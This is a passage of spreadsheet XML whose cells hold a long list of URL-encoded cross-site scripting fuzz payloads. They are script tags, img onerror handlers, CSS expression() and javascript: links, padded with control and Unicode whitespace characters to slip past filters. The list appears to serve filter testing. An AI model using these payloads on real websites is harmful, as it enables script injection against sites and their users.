        <v>134</v>
      </c>
      <c r="B1478" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%3EABC%3Cdiv%20style%3Dfont-family%3A%27foo%27%5Cx3Bx%3Aexpression%28javascript%3Aalert%281%29%3B%2F%2A%27%3B%22%3EDEF</v>
      </c>
    </row>
    <row r="1479">
      <c r="A1479" s="3" t="s">
        <v>136</v>
      </c>
      <c r="B1479" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Eif%28%22x%5C%5CxE1%5Cx96%5Cx89%22.length%3D%3D2%29%20%7B%20javascript%3Aalert%281%29%3B%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1480">
      <c r="A1480" s="3" t="s">
        <v>137</v>
      </c>
      <c r="B1480" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Eif%28%22x%5C%5CxE0%5CxB9%5Cx92%22.length%3D%3D2%29%20%7B%20javascript%3Aalert%281%29%3B%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1481">
      <c r="A1481" s="3" t="s">
        <v>138</v>
      </c>
      <c r="B1481" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Eif%28%22x%5C%5CxEE%5CxA9%5Cx93%22.length%3D%3D2%29%20%7B%20javascript%3Aalert%281%29%3B%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" s="5" t="s">
        <v>32</v>
      </c>
      <c r="B1482" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%3E%3C%5Cx3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1483">
      <c r="A1483" s="5" t="s">
        <v>33</v>
      </c>
      <c r="B1483" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%3E%3C%5Cx00script%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1484">
      <c r="A1484" s="5" t="s">
        <v>139</v>
      </c>
      <c r="B1484" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%3E%3C%5Cx3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%27%60%3E%3C%5Cx00img%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1485">
      <c r="A1485" s="3" t="s">
        <v>140</v>
      </c>
      <c r="B1485" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3Atext%2Fplain%5Cx2Cjavascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1486">
      <c r="A1486" s="3" t="s">
        <v>141</v>
      </c>
      <c r="B1486" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3A%5CxD4%5Cx8F%2Cjavascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1487">
      <c r="A1487" s="3" t="s">
        <v>142</v>
      </c>
      <c r="B1487" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3A%5CxE0%5CxA4%5Cx98%2Cjavascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1488">
      <c r="A1488" s="3" t="s">
        <v>143</v>
      </c>
      <c r="B1488" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3A%5CxCB%5Cx8F%2Cjavascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1489">
      <c r="A1489" s="3" t="s">
        <v>24</v>
      </c>
      <c r="B1489" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx20type%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1490">
      <c r="A1490" s="3" t="s">
        <v>26</v>
      </c>
      <c r="B1490" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx3Etype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1491">
      <c r="A1491" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B1491" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Dtype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1492">
      <c r="A1492" s="3" t="s">
        <v>28</v>
      </c>
      <c r="B1492" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx09type%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1493">
      <c r="A1493" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B1493" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Ctype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1494">
      <c r="A1494" s="3" t="s">
        <v>30</v>
      </c>
      <c r="B1494" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx2Ftype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1495">
      <c r="A1495" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B1495" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Atype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1496">
      <c r="A1496" s="3" t="s">
        <v>144</v>
      </c>
      <c r="B1496" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%5Cx3Aexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1497">
      <c r="A1497" s="3" t="s">
        <v>145</v>
      </c>
      <c r="B1497" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3Aexpression%5Cx5C%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1498">
      <c r="A1498" s="3" t="s">
        <v>146</v>
      </c>
      <c r="B1498" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3Aexpression%5Cx00%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1499">
      <c r="A1499" s="3" t="s">
        <v>147</v>
      </c>
      <c r="B1499" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3Aexp%5Cx00ression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1500">
      <c r="A1500" s="3" t="s">
        <v>148</v>
      </c>
      <c r="B1500" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3Aexp%5Cx5Cression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1501">
      <c r="A1501" s="3" t="s">
        <v>149</v>
      </c>
      <c r="B1501" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx0Aexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1502">
      <c r="A1502" s="3" t="s">
        <v>150</v>
      </c>
      <c r="B1502" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx09expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1503">
      <c r="A1503" s="3" t="s">
        <v>151</v>
      </c>
      <c r="B1503" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE3%5Cx80%5Cx80expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1504">
      <c r="A1504" s="3" t="s">
        <v>152</v>
      </c>
      <c r="B1504" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx84expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1505">
      <c r="A1505" s="3" t="s">
        <v>153</v>
      </c>
      <c r="B1505" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxC2%5CxA0expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1506">
      <c r="A1506" s="3" t="s">
        <v>154</v>
      </c>
      <c r="B1506" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx80expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1507">
      <c r="A1507" s="3" t="s">
        <v>155</v>
      </c>
      <c r="B1507" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx8Aexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1508">
      <c r="A1508" s="3" t="s">
        <v>156</v>
      </c>
      <c r="B1508" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx0Dexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1509">
      <c r="A1509" s="3" t="s">
        <v>157</v>
      </c>
      <c r="B1509" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx0Cexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1510">
      <c r="A1510" s="3" t="s">
        <v>158</v>
      </c>
      <c r="B1510" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx87expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1511">
      <c r="A1511" s="3" t="s">
        <v>159</v>
      </c>
      <c r="B1511" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxEF%5CxBB%5CxBFexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1512">
      <c r="A1512" s="3" t="s">
        <v>160</v>
      </c>
      <c r="B1512" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx20expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1513">
      <c r="A1513" s="3" t="s">
        <v>161</v>
      </c>
      <c r="B1513" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx88expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1514">
      <c r="A1514" s="3" t="s">
        <v>162</v>
      </c>
      <c r="B1514" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx00expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1515">
      <c r="A1515" s="3" t="s">
        <v>163</v>
      </c>
      <c r="B1515" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx8Bexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1516">
      <c r="A1516" s="3" t="s">
        <v>164</v>
      </c>
      <c r="B1516" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx86expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1517">
      <c r="A1517" s="3" t="s">
        <v>165</v>
      </c>
      <c r="B1517" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx85expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1518">
      <c r="A1518" s="3" t="s">
        <v>166</v>
      </c>
      <c r="B1518" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx82expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1519">
      <c r="A1519" s="3" t="s">
        <v>167</v>
      </c>
      <c r="B1519" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx0Bexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1520">
      <c r="A1520" s="3" t="s">
        <v>168</v>
      </c>
      <c r="B1520" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx81expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1521">
      <c r="A1521" s="3" t="s">
        <v>169</v>
      </c>
      <c r="B1521" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx83expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1522">
      <c r="A1522" s="3" t="s">
        <v>170</v>
      </c>
      <c r="B1522" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx89expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="1523">
      <c r="A1523" s="3" t="s">
        <v>171</v>
      </c>
      <c r="B1523" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Bjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1524">
      <c r="A1524" s="3" t="s">
        <v>172</v>
      </c>
      <c r="B1524" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Fjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1525">
      <c r="A1525" s="3" t="s">
        <v>173</v>
      </c>
      <c r="B1525" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxC2%5CxA0javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1526">
      <c r="A1526" s="3" t="s">
        <v>174</v>
      </c>
      <c r="B1526" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx05javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1527">
      <c r="A1527" s="3" t="s">
        <v>175</v>
      </c>
      <c r="B1527" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE1%5CxA0%5Cx8Ejavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1528">
      <c r="A1528" s="3" t="s">
        <v>176</v>
      </c>
      <c r="B1528" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx18javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1529">
      <c r="A1529" s="3" t="s">
        <v>177</v>
      </c>
      <c r="B1529" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx11javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1530">
      <c r="A1530" s="3" t="s">
        <v>178</v>
      </c>
      <c r="B1530" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx88javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1531">
      <c r="A1531" s="3" t="s">
        <v>179</v>
      </c>
      <c r="B1531" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx89javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1532">
      <c r="A1532" s="3" t="s">
        <v>180</v>
      </c>
      <c r="B1532" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx80javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1533">
      <c r="A1533" s="3" t="s">
        <v>181</v>
      </c>
      <c r="B1533" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx17javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1534">
      <c r="A1534" s="3" t="s">
        <v>182</v>
      </c>
      <c r="B1534" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx03javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1535">
      <c r="A1535" s="3" t="s">
        <v>183</v>
      </c>
      <c r="B1535" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Ejavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1536">
      <c r="A1536" s="3" t="s">
        <v>184</v>
      </c>
      <c r="B1536" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Ajavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1537">
      <c r="A1537" s="3" t="s">
        <v>185</v>
      </c>
      <c r="B1537" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx00javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1538">
      <c r="A1538" s="3" t="s">
        <v>186</v>
      </c>
      <c r="B1538" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx10javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1539">
      <c r="A1539" s="3" t="s">
        <v>187</v>
      </c>
      <c r="B1539" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx82javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1540">
      <c r="A1540" s="3" t="s">
        <v>188</v>
      </c>
      <c r="B1540" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx20javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1541">
      <c r="A1541" s="3" t="s">
        <v>189</v>
      </c>
      <c r="B1541" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx13javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1542">
      <c r="A1542" s="3" t="s">
        <v>190</v>
      </c>
      <c r="B1542" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx09javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1543">
      <c r="A1543" s="3" t="s">
        <v>191</v>
      </c>
      <c r="B1543" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx8Ajavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1544">
      <c r="A1544" s="3" t="s">
        <v>192</v>
      </c>
      <c r="B1544" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx14javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1545">
      <c r="A1545" s="3" t="s">
        <v>193</v>
      </c>
      <c r="B1545" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx19javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1546">
      <c r="A1546" s="3" t="s">
        <v>194</v>
      </c>
      <c r="B1546" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5CxAFjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1547">
      <c r="A1547" s="3" t="s">
        <v>195</v>
      </c>
      <c r="B1547" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Fjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1548">
      <c r="A1548" s="3" t="s">
        <v>196</v>
      </c>
      <c r="B1548" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx81javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1549">
      <c r="A1549" s="3" t="s">
        <v>197</v>
      </c>
      <c r="B1549" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Djavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1550">
      <c r="A1550" s="3" t="s">
        <v>198</v>
      </c>
      <c r="B1550" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx87javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1551">
      <c r="A1551" s="3" t="s">
        <v>199</v>
      </c>
      <c r="B1551" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx07javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1552">
      <c r="A1552" s="3" t="s">
        <v>200</v>
      </c>
      <c r="B1552" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE1%5Cx9A%5Cx80javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1553">
      <c r="A1553" s="3" t="s">
        <v>201</v>
      </c>
      <c r="B1553" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx83javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1554">
      <c r="A1554" s="3" t="s">
        <v>202</v>
      </c>
      <c r="B1554" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx04javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1555">
      <c r="A1555" s="3" t="s">
        <v>203</v>
      </c>
      <c r="B1555" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx01javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1556">
      <c r="A1556" s="3" t="s">
        <v>204</v>
      </c>
      <c r="B1556" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx08javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1557">
      <c r="A1557" s="3" t="s">
        <v>205</v>
      </c>
      <c r="B1557" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx84javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1558">
      <c r="A1558" s="3" t="s">
        <v>206</v>
      </c>
      <c r="B1558" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx86javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1559">
      <c r="A1559" s="3" t="s">
        <v>207</v>
      </c>
      <c r="B1559" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE3%5Cx80%5Cx80javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1560">
      <c r="A1560" s="3" t="s">
        <v>208</v>
      </c>
      <c r="B1560" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx12javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1561">
      <c r="A1561" s="3" t="s">
        <v>209</v>
      </c>
      <c r="B1561" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Djavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1562">
      <c r="A1562" s="3" t="s">
        <v>210</v>
      </c>
      <c r="B1562" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Ajavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1563">
      <c r="A1563" s="3" t="s">
        <v>211</v>
      </c>
      <c r="B1563" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Cjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1564">
      <c r="A1564" s="3" t="s">
        <v>212</v>
      </c>
      <c r="B1564" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx15javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1565">
      <c r="A1565" s="3" t="s">
        <v>213</v>
      </c>
      <c r="B1565" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5CxA8javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1566">
      <c r="A1566" s="3" t="s">
        <v>214</v>
      </c>
      <c r="B1566" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx16javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1567">
      <c r="A1567" s="3" t="s">
        <v>215</v>
      </c>
      <c r="B1567" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx02javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1568">
      <c r="A1568" s="3" t="s">
        <v>216</v>
      </c>
      <c r="B1568" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Bjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1569">
      <c r="A1569" s="3" t="s">
        <v>217</v>
      </c>
      <c r="B1569" s="4" t="str">
